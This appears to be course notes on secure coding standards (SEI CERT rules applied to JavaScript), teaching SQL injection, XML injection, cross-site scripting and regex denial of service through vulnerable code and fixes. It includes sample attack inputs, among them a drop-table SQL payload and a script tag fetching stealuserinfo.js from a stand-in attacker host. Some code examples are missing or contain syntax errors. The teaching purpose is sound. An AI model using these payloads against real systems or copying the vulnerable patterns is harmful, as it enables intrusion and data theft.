50.003 - Code Standards
Learning Outcomes
By the end of this unit, you should be able to
- Apply SEI CERT Java Coding Standard to improve security level of a software system
Coding Standard
Coding standard is a common guideline for a group of software engineers to follows so as to
- have a uniform structure of most of the codes
- improve readability
- improve referenceability
- improve maintainability
- minimize exploitability
Example, we find
- https://google.github.io/styleguide/
- https://wiki.sei.cmu.edu/confluence/display/java/SEI+CERT+Oracle+Coding+Standard+for+Java
SEI CERT Java Coding Standard
Let's take SEI CERT Java Coding Standard as an example. It consists of a set of rules which are meant to provide normative requirements for code. Each rule is associated with a metrics for severity (low, medium, and high), likelihood (unlikely, probably, and likely) and remediation cost (high, medium, and low). Conformance to the rule can be determined through automated analysis (either static or dynamic), formal methods, or manual inspection techniques.
For example, we find a subset of the rules as follows,
- Input valuation and data sanitization
- Object-orientation (not related for now since we focus on JavaScript). But you are strongly encouraged to read up.
- Locking and thread-safety (we've covered in some earlier unit in week 6.)
- Visibility and atomicity (not covered in this course)
Although these coding standards are set for Java and our main language for the module is JavaScript, we will discuss those are applicable to both languages.
Input Validation and Data Sanitization
Many programs accept untrusted data originating from unvalidated users, network connections, and other untrusted sources and then pass the (modified or unmodified) data across a trust boundary to a different trusted domain. Such data must be sanitized.
For example, we find the following rules in this category
- IDS00-J. Sanitize untrusted data passed across a trust boundary
- IDS01-J. Normalize strings before validating them
- IDS11-J. Eliminate non-character code points before validation
IDS00-J. Sanitize untrusted data passed across a trust boundary
The main idea is simple, given data provided by 3rd party, we should perform some sanitization to ensure the data is not malicious.
SQL Injection
An example of such data is SQL injection.
Suppose, we have the following code
function login(db, un, pw) {
const [rows, fieldDefs] = await db.pool.query(`
SELECT * FROM db_user WHERE username='${un}' AND password='${pw}'
`);
let found = false;
if (rows.length > 0) {
found = true;
}
return found;
}
Function login
takes a database connection object con
, the username un
and password pw
and try to search for the user record in the db_user
table.
Note that un
and pw
are input strings povided by external parties, normal users and malicious users.
A malicious user might set un
to ""
and pw
to "' OR '0'='0"
the query becomes
db_user
table. As a result, the user can login without giving a user name and password.
In the worst situation, a malicious user could give the following input un = ""
and pw = "'; drop table db_user; --"
, the query becomes
As a result, all the records in the db_user
are deleted.
To prevent SQL injection attacks, a Prepared Statement should be used.
function login(db, un, pw) {
const [rows, fieldDefs] = await db.pool.query(`
SELECT * FROM db_user WHERE username= ? AND password= ?
`, [un, pw]);
let found = false;
if (rows.length > 0) {
found = true;
}
return found;
}
In the updated version above, we use an overloaded query()
to define a prepared statement. to manage the query. The ?
placeholders allow the programmers to indicate where the untrusted input should be inserted after being sanitized. Via the prepared statement, we sanitize the untrusted input strings before inserting them into the statement.
XML Injection
Besides SQL injection, untrusted XML data fragment imposes threats to the system security too.
Consider the following JavaScript program
function addIPhone(qty) {
const doc = `<item>
<description>iPhone X</description>
<price>999.0</price>
<quantity>${qty}</quantity>
</item>`;
addToCart(doc);
}
qty = "1"
, the resulting
XML document
which captures the user's shopping item, will be process by addToCart()
function.
Suppose a malicious user invokes the function with a rigged input qty = "1</quantity><price>1.0</price><quantity>1"
which results in the following XML document
<item>
<description>iPhone X</description>
<price>999.0</price>
<quantity>1</quantity>
<price>1</price>
<quantity>1</quantity>
</item>
addToCart()
method processes the elements top-to-bottom in order, it might override the price value 999.0
by 1
.
The fix to this issue is similar to the one for SQL injection. What is required is to santize the input string before embedding into the XML template which is used as a trusted data.
IDS01-J. Normalize strings before validating them
Cross Site Scripting
The third example of security loop holes caused by using untrusted data in the trusted context is Cross Site Scripting.
Consider the following app
app.use('/', (req,res) => {
let msg = dbmodel.getOne();
res.send(
`<div> the message is </div> <div> ${msg} </div>`
);
})
Suppose the message created by some normal user and recored in the database is "hello"
. The above route handler returns
However the threat surfaces when the message retrieved from the database is
"<script src='http://hacker-network.io/stealuserinfo.js' type='javascript'></script> "
as the resulting html document becomes
<div> the message is </div>
<div> <script src='http://hacker-network.io/stealuserinfo.js' type='javascript'></script> </div>
when it is executed on the victim's browser, the hacker's script will be executed and extract the information from the victim's machine.
One way to address this issue is to santize the record retrieved from the database
app.use('/', (req,res) => {
let msg = dbmodel.getOne();
const regex = /<.*>/g;
let html = "":
if (msg.match(regex)) {
html = "<div> the message contains some illegal characters </div>";
} else {
html = `<div> the message is </div> <div> ${msg} </div>`;
}
res.send(html);
})
However this might not cover all edge cases. Suppose the malicious user use the unicode representation of the <
and >
, namely and \uFE64
and \uFE65
.
This motivates the need of normalizing the unicode representations into the ascii representation before sanization.
app.use('/', (req,res) => {
let msg = dbmodel.getOne();
const regex = /<.*>/g;
let html = "":
if (msg.normalize('NFKC').match(regex)) {
html = "<div> the message contains some illegal characters </div>";
} else {
html = `<div> the message is </div> <div> ${msg} </div>`;
}
res.send(html);
})
Using Regex to sanitze input
Regular expression (Regex) is a commonly use domain specific language for string and data matching. It has a compact syntax and light-weightish implementation. Most of the languages come with libraries support of regex. For instance, in JavaScript, we use the following statement to define a regex object.
orThen we can run it using
Here are some basic examples of constructing regex pattern.
Matching a single expression
In the above code snippet, r1
is a regex that matches a character a
. In the second line, we match the input string aaa
with the pattern. The result contains
the part that the regex matches, which is 'a'
, its index and the input and the groups if available. Note that it only searches for the pattern once in the input string.
Matching a single expression globally
If we want to apply the regex to look matches "globally" over the input, we define
Case insensitivity
If we would like to ignore case sensitivity during the match, we add i
to the flags field.
Anchored match
Sometimes we would like to regex to match with the exact starting and ending of the input.
In the above ^
denotes the starting of the input and $
denotes the ending.
Character class match
If we want to match a set of alterantive characters, we use
const r5 = /[ab]/g; // match everywhere with character group, a or b
"abb".match(r5); // [ 'a', 'b', 'b' ]
Note that if we use a ^
in a []
it means not, e.g. /[^ab]/
means match any character except for a
and b
.
Kleene's star
Klenee's star allows us to repeat a sub-regex pattern many times. (Note this is different from the global flag g
, which produces a list of matches).
const r6 = /a*/ // repetition, zero or more
"aaa".match(r6); // [ 'aaa', index: 0, input: 'aaa', groups: undefined ]
Reference group
Sometimes, we would like to match and extract parts of the input. We use paranthesis to annotate the sub part that we would like to extract.
const r7 = /a(a*)/ // match and extract into groups
"aaa".match(r7); // [ 'aaa', 'aa', index: 0, input: 'aaa', groups: undefined ]
In the above, we match then extract the rest of a
after the first a
.
Note that we can add referenced kleene's star regex with a global flag. The following will produce an initialization error.
More on repetition
Besides kleene's star, we have the following different operators that define different constraint of repetition.
const r9 = /a+/ // repetition, one or more
const r10 = /a{2,}/ // repetition, two or more
const r11 = /a{2,3}/ // repetition, two or three
const r12 = /a{3}/ // repetition, exactly three
Pitfall of using Regex as input sanitzer
There many different algorithm in implementing regex matching. Unfortunately many existing libraries use a back-tracking approach when performing the regex matching. This leads to a possible security threat to the software system. e.g.
The above takes a substantial amount of time to converge, because the nested kleene's star of (a*)*
. The backtracking algorithm tries to back-track and searches for alternative to satisfy the match with the ending h
character though there are exponentially many paths to back-track.
In general, when a nested repeatable regex accept an empty input, it is problematic, it is classified as evil regular expression.
For more details, refer to